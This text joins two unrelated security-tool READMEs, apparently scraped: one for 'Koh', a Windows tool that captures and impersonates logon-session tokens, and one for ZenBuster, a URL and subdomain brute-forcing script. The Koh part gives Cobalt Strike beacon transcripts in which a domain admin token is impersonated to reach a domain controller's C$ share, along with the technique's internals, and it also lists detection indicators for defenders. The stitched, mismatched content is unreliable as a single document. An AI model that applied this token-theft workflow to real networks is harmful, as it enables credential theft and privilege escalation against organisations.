Group SID Filtering

The koh filter add S-1-5-21-<DOMAIN>-<RID> command will only capture tokens that contain the supplied group SID. This command can be run multiple times to add additional SIDs for capture. This can help prevent possible stability issues due to a large number of token leaks.

Example - Capture

"Captures" logon sessions by negotiating usable tokens for each new session.

Server:

C:\Temp>Koh.exe capture

__ ___ ______ __ __
| |/ / / __ \ | | | |
| ' / | | | | | |__| |
| < | | | | | __ |
| . \ | `--' | | | | |
|__|\__\ \______/ |__| |__|
v1.0.0


[*] Command: capture

[*] Starting server with named pipe: imposecost

[*] Elevated to SYSTEM


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\testuser
LUID : 207990196
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1119
Credential UserName : testuser@THESHIRE.LOCAL
Origin LUID : 1677733 (0x1999a5)

[*] Successfully negotiated a token for LUID 207990196 (hToken: 848)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\DA
LUID : 81492692
LogonType : Interactive
AuthPackage : Negotiate
User SID : S-1-5-21-937929760-3187473010-80948926-1145
Credential UserName : da@THESHIRE.LOCAL
Origin LUID : 1677765 (0x1999c5)

[*] Successfully negotiated a token for LUID 81492692 (hToken: 976)


[*] New Logon Session - 6/22/2022 2:53:01 PM
UserName : THESHIRE\harmj0y
LUID : 1677733
LogonType : Interactive
AuthPackage : Kerberos
User SID : S-1-5-21-937929760-3187473010-80948926-1104
Credential UserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999 (0x3e7)

[*] Successfully negotiated a token for LUID 1677733 (hToken: 980)

BOF client:

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Access is denied.

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> koh list
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:

Username : THESHIRE\localadmin (S-1-5-21-937929760-3187473010-80948926-1000)
LUID : 67556826
CaptureTime : 6/21/2022 1:24:42 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : localadmin@THESHIRE.LOCAL
Origin LUID : 1676720

Username : THESHIRE\da (S-1-5-21-937929760-3187473010-80948926-1145)
LUID : 67568439
CaptureTime : 6/21/2022 1:24:50 PM
LogonType : Interactive
AuthPackage : Negotiate
CredUserName : da@THESHIRE.LOCAL
Origin LUID : 1677765

Username : THESHIRE\harmj0y (S-1-5-21-937929760-3187473010-80948926-1104)
LUID : 1677733
CaptureTime : 6/21/2022 1:23:10 PM
LogonType : Interactive
AuthPackage : Kerberos
CredUserName : harmj0y@THESHIRE.LOCAL
Origin LUID : 999

beacon> koh groups 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
S-1-5-21-937929760-3187473010-80948926-513
S-1-5-21-937929760-3187473010-80948926-512
S-1-5-21-937929760-3187473010-80948926-525
S-1-5-21-937929760-3187473010-80948926-572

beacon> koh impersonate 67568439
[+] host called home, sent: 6548 bytes
[+] received output:
[*] Using KohPipe : \\.\pipe\imposecost

[+] received output:
[*] Enabled SeImpersonatePrivilege

[+] received output:
[*] Creating impersonation named pipe: \\.\pipe\imposingcost

[+] received output:
[*] Impersonation succeeded. Duplicating token.

[+] received output:
[*] Impersonated token successfully duplicated.

[+] Impersonated THESHIRE\da

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are THESHIRE\DA (admin)

beacon> shell dir \\dc.theshire.local\C$
[*] Tasked beacon to run: dir \\dc.theshire.local\C$
[+] host called home, sent: 69 bytes
[+] received output:
Volume in drive \\dc.theshire.local\C$ has no label.
Volume Serial Number is A4FF-7240

Directory of \\dc.theshire.local\C$

01/04/2021 11:43 AM <DIR> inetpub
05/30/2019 03:08 PM <DIR> Pe rfLogs
05/18/2022 01:27 PM <DIR> Program Files
04/15/2021 09:44 AM <DIR> Program Files (x86)
03/20/2020 12:28 PM <DIR> RBFG
10/20/2021 01:14 PM <DIR> Temp
05/23/2022 06:30 PM <DIR> tools
03/11/2022 04:10 PM <DIR> Users
06/21/2022 01:30 PM <DIR> Windows
0 File(s) 0 bytes
9 Dir(s) 40,504,201,216 bytes free

Technical Background

When a new logon session is estabslished on a system, a new token for the logon session is created by LSASS using the NtCreateToken() API call and returned by the caller of LsaLogonUser(). This increases the ReferenceCount field of the logon session kernel structure. When this ReferenceCount reaches 0, the logon session is destroyed. Because of the information described in the Why This Is Possible section, Windows systems will NOT release a logon session if a token handle still exists to it (and therefore the reference count != 0).

So if we can get a handle to a newly created logon session via a token, we can keep that logon session open and later impersonate that token to utilize any cached credentials it contains.

Why This Is Possible

According to this post by a Microsoft engineer:

After MS16-111, when security tokens are leaked, the logon sessions associated with those security tokens also remain on the system until all associated tokens are closed... even after the user has logged off the system. If the tokens associated with a given logon session are never released, then the system now also has a permanent logon session leak as well.

MS16-111 was applied back to Windows 7/Server 2008, so this approach should be effective for everything except Server 2003 systems.

Approach

Enumerating logon sessions is easy (from an elevated context) through the use of the LsaEnumerateLogonSessions() Win32 API. What is more difficult is taking a specific logon session identifier (LUID) and somehow getting a usable token linked to that session.

Possible Approaches

We brainstormed a few ways to a) hold open logon sessions and b) abuse this for token impersonation/use of cached credentials.

  1. The first approach was to use NtCreateToken() which allows you to specify a logon session ID (LUID) to create a new token.
    • Unfortunately, you need SeCreateTokenPrivilege which is traditionally only held by LSASS, meaning you need to steal LSASS' token which isn't ideal.
    • One possibility was to add SeCreateTokenPrivilege to NT AUTHORITY\SYSTEM via LSA policy modification, but this would need a reboot/new logon session to express the new user rights.
  2. You can also focus on just RemoteInteractive logon sessions by using WTSQueryUserToken() to get tokens for new desktop sessions to clone.
    • This is the approach apparently demonstrated by Ryan.
    • Unfortunately this misses newly created local sessions and incoming sessions created from things like PSEXEC.
  3. On a new logon session, open up a handle to every reachable process and enumerate all existing handles, cloning the token linked to the new logon session.
    • This requires opening up lots of processes/handles, which looks very suspicious.
  4. The AcquireCredentialsHandle()/InitializeSecurityContext()/AcceptSecurityContext() approach described below, which is what we went with.

Our Approach

The SSPI AcquireCredentialsHandle() call has a pvLogonID field which states:

A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. 

Note: In order to utilize a logon session LUID with AcquireCredentialsHandle() you need SeTcbPrivilege, however this is usually easier to get than SeCreateTokenPrivilege.

Using this call while specifying a logon session ID/LUID appears to increase the ReferenceCount for the logon session structure, preventing it from being released. However, we're not presented with another problem: given a "leaked"/held open logon session, how do we get a usable token from it? WTSQueryUserToken() only works with desktop sessions, and there's no userland API that we could find that lets you map a LUID to a usable token.

However we can use two additional SSPI functions, InitializeSecurityContext() and AcceptSecurityContext() to act as client and server to ourselves, negotiating a new security context that we can then use with QuerySecurityContextToken() to get a usable token. This was documented in KB180548 (mirrored by PKISolutions here) for the purposes of credential validation. This is a similar approach to Internal-Monologue, except we are completing the entire handshake process, producing a token, and then holding that for later use.

Filtering can then be done on the token itself, via CheckTokenMembership() or GetTokenInformation(). For example, we could release any tokens except for ones belonging to domain admins, or specific groups we want to target.

Advantages/Disadvantages Versus Traditional Credential Extraction

Advantages

  • Works for both local and inbound (non-network) logons.
  • Works for inbound sessions created via Kerberos and NTLM.
  • Doesn’t require opening up a handle to multiple processes.
  • Doesn't create a new logon event or logon session.
  • Doesn't create additional event logs on the DC outside of normal system ticket renewal behavior (I don't think?)
  • No default lifetime on the tokens (I don't think?) so access should work as long as the captured account’s credentials don't change and the system doesn’t reboot.
  • Reuses legitimate captured auth on a system, so should "blend with the noise" reasonably well.

Disadvantages

  • Access is only usable as long as the system doesn't reboot.
  • Doesn't let you reuse access on other systems
    • However, and existing ticket/credential extraction can still be done on the leaked logon session.
  • May cause instability if a large number of sessions are leaked (though this can be mitigated with token group SID filtering) and restricting the maximum number of captured tokens (default of 1000 here).

The Inline Shenanigans Bug

I've been coding for a decent amount of time. This is one of the weirder and frustrating-to-track-down bugs I've hit in a while - please help me with this lol.

  • When the Koh.exe assembly is run from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run via Cobalt Strike's Beacon fork&run process with execute-assembly from an elevated (but non-SYSTEM) context, everything works properly.

  • If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in a SYSTEM context, everything works properly.

  • However If the Koh.exe assembly is run inline (via InlineExecute-Assembly or Inject-Assembly) for a Cobalt Strike Beacon that's running in an elevated, but not SYSTEM, context, the call to AcquireCredentialsHandle() fails with SEC_E_NO_CREDENTIALS and everything fails ¯\_(ツ)_/¯

We have tried (with no success):

  • Spinning off everything to a separate thread, specifying a STA thread apartment.
  • Trying to diagnose RPC weirdness (still more to investigate here).
  • Using DuplicateTokenEx and SetThreadToken instead of ImpersonateLoggedOnUser.
  • Checking if we have the proper SeTcbPrivilege right before the AcquireCredentialsHandle call (we do).

For all intents and purposes, the thread context right before the call to AcquireCredentialsHandle works in this context, but the result errors out. And we have no idea why.

If you have an idea of what this might be, please let us know! And if you want to try playing around with a simpler assembly, check out the AcquireCredentialsHandle repo on my GitHub for troubleshooting.

IOCs

To quote @tifkin_ "Everything is stealthy until someone is looking for it." While Koh's approach is slightly different than others, there are still IOCs that can be used to detect it.

The unique TypeLib GUID for the C# Koh collector is 4d5350c8-7f8c-47cf-8cde-c752018af17e as detailed in the Koh.yar Yara rule in this repo. If this is not changed on compilation, it should be a very high fidelity indicator of the Koh server.

When the Koh server starts is opens up a named pipe called \\.\pipe\imposecost that stays open as long as Koh is running. The default password used for Koh communication is password, so sending password list to any \\.\pipe\imposecost pipe will let you confirm if Koh is indeed running. The default impersonation pipe used is \\.pipe\imposingcost.

If Koh starts in an elevated context but not as SYSTEM, a handle/token clone of winlogon is performed to perform a getsystem type elevation.

I'm sure that no attackers will change the indicators mentioned above.

There are likely some RPC artifacts for the token capture that we're hoping to investigate. We will update this section of the README if we find any additional detection artifacts along these lines. Hooking of some of the possibly-uncommon APIs used by Koh (LsaEnumerateLogonSessions or the specific AcquireCredentialsHandle/InitializeSecurityContext/AcceptSecurityContext, specifically using a LUID in AcquireCredentialsHandle) could be explored for effectiveness, but alas, I am not an EDR.

TODO

  • Additional testing in the lab and field. Possible concerns:
    • Stability in production environments, specifically intentional token leakage causing issues on highly-trafficked servers
    • Total actual effective token lifetime
  • "Remote" client that allows for monitoring through the Koh named pipe remotely
  • Implement more clients (PowerShell, C#, C++, etc.)
  • Fix the Inline Shenanigans Bug


Zenbuster - Multi-threaded URL Enumeration/Brute-Forcing Tool


ZenBuster is a multi-threaded, multi-platform URL enumeration tool written in Python by Zach Griffin (@0xTas).

I wrote this tool as a way to deepen my familiarity with Python, and to help increase my understanding of Cybersecurity tooling in general. ZenBuster may not be the fastest or most comprehensive tool of its kind. It is however, simple to use, decently flexible, and in practice only marginally slower than other "tried-and-true" tools like Gobuster. Personally, I have been using it to help me solve CTF challenges on platforms like TryHackMe, and have found my implementation to be satisfactorily reliable.

This software is intended for use in CTF challenges, or by security professionals to gather information on their targets:

  • It is capable of brute-force enumerating subdomains and also URI resources (directories/files).
  • Both methods of enumeration require use of an appropriate wordlist or dictionary file.
  • Features Include:
    1. Hostname format supports standard, IPv4, and IPv6.
    2. Support for logging results to a file with -O [filename].
    3. Specifying custom ports for nonstandard webservers with -p .
    4. Optional file extensions in directory mode with -x .
    5. Quiet mode for less distracting output with -Q.
    6. Color can be disabled for less distracting output with -nc/-nl.
    7. Tested on Python versions 3.9 and 3.10, with theoretical support for versions >= 3.6

CAUTION/DISCLAIMER

ZenBuster is capable of producing a potentially unwelcome number of HTTP requests in a short amount of time.

The developers and contributors are not liable or responsible for any damage caused by misuse or abuse of this software.

Please Enumerate Responsibly!

License

Multi-threaded URL enumeration/brute-forcing tool in Python. (5)

ZenBuster is licensed under the GNU GPLv3 License, see here for more information.

Credits

Yin-Yang ASCII art in the banners were created by Joan G. Stark (jgs) and Hayley Jane Wakenshaw (hjw). Modifications were made by me, when specified with: 'zg'.


Installation

Firstly, ensure that Python version >= 3.6 is installed, then clone the repository with:

git clone https://github.com/0xTas/zenbuster.git

Next, cd zenbuster.

Dependencies

ZenBuster relies on 3 external libraries to function, and it is recommended to install these with:

pip install -r requirements.txt

The modules that will be installed and their purposes are as follows:

  1. Python requests

    • The backbone of each enumeration request. Without this, the script will not function.
  2. termcolor

    • Enables colored terminal output. Non-critical, the script can still run without color if this is not present.
  3. colorama (Windows only)

    • Primes the Windows terminal to accept ANSI color codes (from Termcolor). Non-critical.

These dependencies may be installed manually, with pip using requirements.txt, or via interaction with the script upon first run.


Usage

Once dependencies have been installed, you can run the program in the following ways:

On Linux (+Mac?):

./zenbuster.py [options] or python3 zenbuster.py [options]

On Windows:

python zenbuster.py [options]

[Options]

Short Flag Long Flag Purpose
-h --help Displays the help screen and exits
-d --dirs Enables Directory Enumeration Mode
-s -ssl Forces usage of HTTPS in requests
-v --verbose Prints verbose info to terminal/log
-q --quiet Minimal terminal output until final results
-nc --no-color Disables colored terminal output
-nl --no-lolcat Disables lolcat-printed banner (Linux only)
-u <hostname> --host Host to target for the scan
-w <wordlist> --wordlist Path to wordlist/dictionary file
-x <exts> --ext Comma-separated list of file extensions (Dirs only)
-p <port#> --port Custom port option for nonstandard webservers
-o [filename] --out-file Log results to a file (accepts custom name/path)

Example Usage

./zenbuster.py -d -w /usr/share/wordlists/dirb/common.txt -u target.thm -v

python3 zenbuster.py -w ../subdomains.txt --host target.thm --ssl -O myResults.log

zenbuster -w subdomains.txt -u target.thm --quiet (With .bashrc alias)


Planned Features/Improvements

  • Increased levels of optional verbosity.
  • Allow optional throttling of task thread-count.
  • Allow users to modify the list of ignored status codes.
  • Allow greater user control over various request headers.
  • Allow optional ignoring of responses based on content-length.
  • Expand subdomain enumeration to include OSINT methods instead of just brute-forcing.
  • Explore a more comprehensive and source-readable solution to fancy colored output (possibly using rich).

Known Issues/Limitations

  • Enumerating long endpoints may result in ugly terminal output due to line-wraping on smaller console windows. Logging to a file is recommended, especially on Windows.
  • If target host is a vHost on a shared webserver, enumeration via IP may not function as expected. Use domain/hostname instead.


❌